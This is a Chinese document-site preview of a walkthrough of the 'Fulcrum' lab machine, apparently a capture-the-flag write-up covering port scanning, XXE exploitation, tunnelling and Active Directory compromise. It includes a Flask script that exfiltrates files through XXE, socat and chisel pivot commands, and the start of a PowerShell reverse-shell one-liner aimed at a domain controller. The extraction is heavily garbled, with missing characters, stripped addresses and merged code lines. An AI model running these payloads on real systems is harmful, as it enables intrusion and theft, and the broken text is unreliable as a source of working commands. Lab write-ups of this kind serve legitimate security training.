2024fulcrum域滲透實戰技術_第1頁
2024fulcrum域滲透實戰技術_第2頁
2024fulcrum域滲透實戰技術_第3頁
2024fulcrum域滲透實戰技術_第4頁
2024fulcrum域滲透實戰技術_第5頁
已閱讀5頁,還剩18頁未讀 繼續免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

PAGEPAGE24域滲透實戰之fulcrum信息收集端?掃描?錄遍歷?錄暴?破解端?端?漏洞利?xxe漏洞?件泄露xxe?件讀取權限提升編寫腳本反彈獲取shell域滲透?絡枚舉翻配置?解密密碼隧道搭建查詢使?原進?枚舉上傳?具執?命令獲取反彈信息收集端?掃描使?nmap進?端?掃描,發現存在?量端?開放接著去查看其版本和對應的服務Fuzz接?使?wfuzz對其url路徑后的參數進?枚舉?錄遍歷使??具進??錄枚舉,未發現有?的?錄接著去看服務,訪問端?為4的???錄暴?破解然后繼續對其進?爆破,發現存在home.php.然后嘗試進?上傳,發現沒法上傳成功88端?訪問88端?,發現存在phpadmin登錄界?嘗試弱?令登錄,沒有成功56423端?使?curl進?測試,發現有回顯漏洞利?xxe漏洞接著使?burp,然后抓包發現其存在xxe漏洞?件泄露然后使?xxe進?加載.dtd?件來讀取?件xxe?件讀取開啟http服務然后將讀取到的內容進?解碼,成功獲取到讀取的內容權限提升SSRF漏洞編寫腳本PlainText1 2importbase64importloggingimportreadlineimportrequestsimportthreadingimporttimefromflaskimportFlask,10log=logging.getLogger('werkzeug')13app=Flask( name )prev_data=16xml_template="""<?xmlversion="1.0"encoding="utf-8"?><!DOCTYPEdataSYSTEM\h"/dtd?fn={}">20@app.route("/dtd")defdtd():fn=request.args['fn'] returnf"""<!ENTITY%fileSYSTEM"php://filter/convert.base64-encode/resource={fn}"> <!ENTITY%all"<!ENTITYsendSYSTEM\h'/exfil?data=%file;'>">26 %all;"""2728@app.route("/exfil")defdata():globalprev_data b64data=request.args['data'].replace('','+')#Flasktriestodecodeitprint(b64data)print(len(b64data))data=base64.b64decode(b64data).decode().strip()ifdata!=prev_data:print(data)prev_data=datareturn404142 defweb():434344454647484950515253545556app.run(host="",port=80)if name ==" main ":threading.Thread(target=web,daemon=True).start()time.sleep(1)#app.run(debug=True,use_reloader=False,host="",port=80)whileTrue:try:fn=input("file>")xml=xml_template.format(fn)requests.post('2:56423',data=xml)exceptKeyboardInterrupt:print()反彈shell執?腳本來反彈shell開啟http服務發現該腳本可以成功執?命令解碼進?查看執?ping之后的內容使?nc進?反彈獲取shell成功獲取webshell查看?絡進程查看端?域滲透?絡枚舉上傳nmap,然后進?端?掃描,發現其存在5985端?翻配置?件發現存在config.inc.php,并發現了?戶名和密碼解密密碼隧道搭建PlainText1 ./socattcp-listen:60218,reuseaddr,forktcp:28:5985&2 ./chisel_1.9.1_linux_amd64server-p8000--reverse3 ./chisel_1.9.1_linux_amd64client9:8001PlainText1 ./socattcp-listen:60218,reuseaddr,forktcp:28:5985&2 ./chisel_1.9.1_linux_amd64server-p8000--reverse3 ./chisel_1.9.1_linux_amd64client9:8001R:socksPlainText1 ./socattcp-listen:55555,reuseaddr,forktcp:28:5985PlainText1 socattcp-listen:5985,reuseaddr,forktcp::55555然后在kali??配置prtoychains,然后進?連接測試Winrm獲取shell發現存在dc和laap的連接記錄LDAP查詢鑒于帳戶名稱和上?的注釋,查詢活動?錄域似乎是個好主意要從PowerShell查詢LDAP,我需要個DirectoryEntry對象這些對象被引?為System.DirectoryServices.DirectoryEntry,或ADSI有多種構造函數(創建對象的?法),但我將使?這個,因為它允許我傳遞?戶名和密碼搜索?戶使?PowerShell進?枚舉發現有8個?戶,它們全部轉儲并滾動瀏覽查詢域管理員上傳PowerView?具上傳腳本,然后執?執?命令PlainText1 PlainText1 .\c.execlient9:8000R:5985:32:5985隧道枚舉查看共享發現域管密碼獲取root.txt讀取到root.txt反彈shell執?命令,然后使?nc來反彈shellPlainText1PlainText1 Invoke-Command-Computerdc.fulcrum.local-Credential$cred-scriptblock{$client=New-ObjectSystem.Net.Sockets.TCPClient('',53);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne0){;$data=(New-Object-TypeNameSystem.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex$data2>&1|Out-String);$sendback2=$sendback+'PS

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經權益所有人同意不得將文件中的內容挪作商業或盈利用途。
  • 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論